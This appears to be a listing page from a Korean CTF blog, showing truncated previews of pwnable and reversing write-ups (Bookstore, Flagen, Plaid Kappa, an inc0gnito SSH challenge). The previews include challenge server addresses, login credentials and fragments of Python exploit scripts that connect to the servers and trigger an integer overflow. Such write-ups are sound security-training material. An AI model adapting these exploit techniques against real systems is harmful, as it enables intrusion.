Category: Pwnable Points: 400 Solves: TODO Description:Binary : http://binary.grayhash.com/7692931e710c1d805224c44ab97ddd52/bookstoreServer : 54.65.201.110Port : TCP 31337Flag Path : /home/bookstore/key Canary, NX, ASLR, PIE가 걸려있다. ROP를 하기엔 무리가 있는 난이도이다. 기본적인 동작과정은 메뉴들을 보면 대충 유추가 가능하다.Bookstore라는 이름과 같이 책정보를 기록하고 관리하는 프로그램이다. 로그인 아이디와 패스워드는 각각 helloadmin / iulover!@#$이다. 여기서 책을 구조체로 정의해 두어서 관리를 ..
12345678910111213141516171819202122232425262728from socket import *from telnetlib import *from struct import pack SERVER = ("prob.layer7.kr", 61616)s = socket(AF_INET, SOCK_STREAM)s.connect(SERVER)t = Telnet()t.sock = s print t.read_until("Password : ")s.send("0z57cr40a2abc34103295de63bb2b36e\n") # send password print t.read_until("people : ")s.send(str(0xFFFF + 1) + "\n") # Short Type integer o..
1234567891011121314151617181920212223from socket import *from telnetlib import *import struct SERVER = ("challs.campctf.ccc.ac", 10118) s = socket(AF_INET, SOCK_STREAM)s.connect(SERVER)t = Telnet()t.sock = s print t.read_until("name?") fmt = struct.pack("
123456789101112131415161718192021222324252627282930import paramikoimport string# ssh anti_hexray@ssh.inc0gnito.com anti_hexray# ctf.inc0gnito.com Inc0gnito CTF reversing 100pts Anti-Hexray ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())ssh.connect("ssh.inc0gnito.com", username = "anti_hexray", password = "anti_hexray") flag = "" while len(flag) != 17: # no inf..
0CTF 2015 Flagen [250pts]https://github.com/ctfs/write-ups-2015/tree/master/0ctf-2015/exploit/flaggenerator 0CTF 2015 Quals CTF: FlagGeneratorCategory: Exploit Points: 250 Solves: 49 Description:Can you generate the correct flag?flagenlibc.so.6202.112.26.106:5149202.112.28.115:5149Notice: Ubuntu 14.04.2 LTS DOWNLOAD ================================================================================..
Plaid CTF 2014 Kappa - 275Points Download from : http://shell-storm.org/repo/CTF/PlaidCTF-2014/Pwnables/kappa/ or 바이너리에 걸린 보호 기법은 NX-Bit밖에 없다. Xinetd로 돌아가는 서비스 이기 때문에 ASLR도 특별히 신경을 써 주어야 한다. 바이너리를 실행 시켜 보면 5가지의 메뉴를 선택 할 수 있고 대부분 단순한 알고리즘으로 돌아가고 있다. 1번으로 들어가면 포켓몬을 잡을 수 있고 2번은 치료 3번은 현재 포켓몬들의 상태를 볼 수 있는 서비스를 제공해 준다. 4번은 포켓몬 방생, 5번은 포켓몬의 삽화를 자신이 직접 바꿀 수 있게 해준다. Vuln 포켓몬은 총 3가지 타입으로 나뉜다. Bird_Jesus,..
예선 당시에는 못풀었던 문제지만 나중에 푼 문제 12345678910111213141516171819202122232425262728293031323334int __cdecl main(int argc, const char **argv, const char **envp){ int result; // eax@2 const unsigned __int16 v4; // ax@4 __int64 v5; // rdx@10 int i; // [sp+1Ch] [bp-124h]@3 int system_command; // [sp+20h] [bp-120h]@1 __int64 STACK_CANARY; // [sp+128h] [bp-18h]@1 STACK_CANARY = *MK_FP(__FS__, 40LL); CLEAR_ENVI..